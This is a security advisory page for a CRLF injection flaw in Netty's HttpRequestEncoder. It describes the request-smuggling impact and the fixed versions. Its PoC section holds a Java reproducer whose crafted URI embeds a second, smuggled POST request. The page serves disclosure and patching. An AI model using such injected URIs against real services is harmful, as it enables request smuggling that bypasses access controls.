VDB
Sign up
MEDIUM6.5

GHSA-84h7-rjj3-6jx4

Netty has a CRLF Injection vulnerability in io.netty.handler.codec.http.HttpRequestEncoder

Quick fix

GHSA-84h7-rjj3-6jx4 — io.netty:netty-codec-http: upgrade to the fixed version with the command below.

# pom.xml: bump <version>4.2.8.Final</version> for io.netty:netty-codec-http

Details

### Summary

The `io.netty.handler.codec.http.HttpRequestEncoder` CRLF injection with the request uri when constructing a request. This leads to request smuggling when `HttpRequestEncoder` is used without proper sanitization of the uri.

### Details

The `HttpRequestEncoder` simply UTF8 encodes the `uri` without sanitization (`buf.writeByte(SP).writeCharSequence(uriCharSequence, CharsetUtil.UTF_8);`)

The default implementation of HTTP headers guards against such possibility already with a validator making it impossible with headers.

### PoC

Simple reproducer:

```java public static void main(String[] args) {

EmbeddedChannel client = new EmbeddedChannel(); client.pipeline().addLast(new HttpClientCodec());

EmbeddedChannel server = new EmbeddedChannel(); server.pipeline().addLast(new HttpServerCodec()); server.pipeline().addLast(new ChannelInboundHandlerAdapter() { @Override public void channelRead(ChannelHandlerContext ctx, Object msg) throws Exception { System.out.println("Processing msg " + msg); } });

DefaultHttpRequest request = new DefaultHttpRequest( HttpVersion.HTTP_1_1, HttpMethod.GET, "/s1 HTTP/1.1\r\n" + "\r\n" + "POST /s2 HTTP/1.1\r\n" + "content-length: 11\r\n\r\n" + "Hello World" + "GET /s1" ); client.writeAndFlush(request); ByteBuf tmp; while ((tmp = client.readOutbound()) != null) { server.writeInbound(tmp); } } ```

### Impact

Any application / framework using `HttpRequestEncoder` can be subject to be abused to perform request smuggling using CRLF injection.

Are you affected?

Enter the version of the package you're using.

Affected packages

Maven/io.netty:netty-codec-http
Introduced in: 4.2.0.Alpha1Fixed in: 4.2.8.Final
Fix# pom.xml: bump <version>4.2.8.Final</version> for io.netty:netty-codec-http
Maven/io.netty:netty-codec-http
Introduced in: 0Fixed in: 4.1.129.Final
Fix# pom.xml: bump <version>4.1.129.Final</version> for io.netty:netty-codec-http

References